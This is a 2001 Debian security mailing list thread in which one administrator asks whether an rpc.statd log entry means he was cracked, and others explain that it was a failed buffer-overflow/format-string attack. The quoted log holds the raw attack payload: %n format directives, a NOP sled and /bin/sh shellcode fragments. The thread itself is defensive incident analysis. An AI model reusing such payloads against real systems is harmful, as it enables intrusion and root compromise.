Re: was I cracked? (rpc.statd, new version)

To: debian-security@lists.debian.org
Subject: Re: was I cracked? (rpc.statd, new version)
From: Jeff Coppock <jcoppock1@home.com>
Date: Wed, 11 Jul 2001 22:29:41 -0700
Message-id: <[🔎] 20010711222941.A2105@nortelnetworks.com>
Mail-followup-to: debian-security@lists.debian.org
In-reply-to: <[🔎] NFBBJDAIMKFDLIMBEEOHEEBCCAAA.jeremy@home.lan>; from jlgaddis@blueriver.net on Wed, Jul 11, 2001 at 11:56:15AM -0500
References: <[🔎] 01071111420302.00984@io> <[🔎] NFBBJDAIMKFDLIMBEEOHEEBCCAAA.jeremy@home.lan>

   Thanks for this explanation.  I got hit with the exact same
   exploit this evening.  I compared my entire /etc structure to
   a known good one from almost a month ago and everything checks
   out.  I'm taking you advise and shutting down this service
   when not using it until I can secure it properly.
   
   thanks,
   jc

Thusly Thwacked By Jeremy Gaddis:
> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed.  The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit.  The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
> 
> As someone else stated, disable the rpc.* services if you
> don't need them.  If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
> 
> j.
> 
> --
> Jeremy L. Gaddis     <jlgaddis@blueriver.net>
> 
> -----Original Message-----
> From: Lukas Eppler [mailto:lukas.eppler@tempobrain.com]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: debian-security@lists.debian.org
> Subject: was I cracked? (rpc.statd, new version)
> 
> 
> I have the following entries in /var/log/messages:
> 
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul  9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
> 
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known
> exploit fixed. I can't find modified binaries or any strange
> behaviour... was
> this a defeated attack? The second line says /bin/sh somewhere which
> makes me
> a bit concerned... Was I cracked?
> 
> Lukas
> 


-- 

Jeff Coppock		Nortel Networks
Systems Engineer	http://nortelnetworks.com
Major Accts.		Santa Clara, CA

Reply to:

References:
- was I cracked? (rpc.statd, new version)
  - From: Lukas Eppler <lukas.eppler@tempobrain.com>
- RE: was I cracked? (rpc.statd, new version)
  - From: "Jeremy Gaddis" <jlgaddis@blueriver.net>

Prev by Date: Exim related buffer overflow in stable
Next by Date: snort rules (Was: Attack alert from snort)
Previous by thread: RE: was I cracked? (rpc.statd, new version)
Next by thread: Re: was I cracked? (rpc.statd, new version)
Index(es):
- Date
- Thread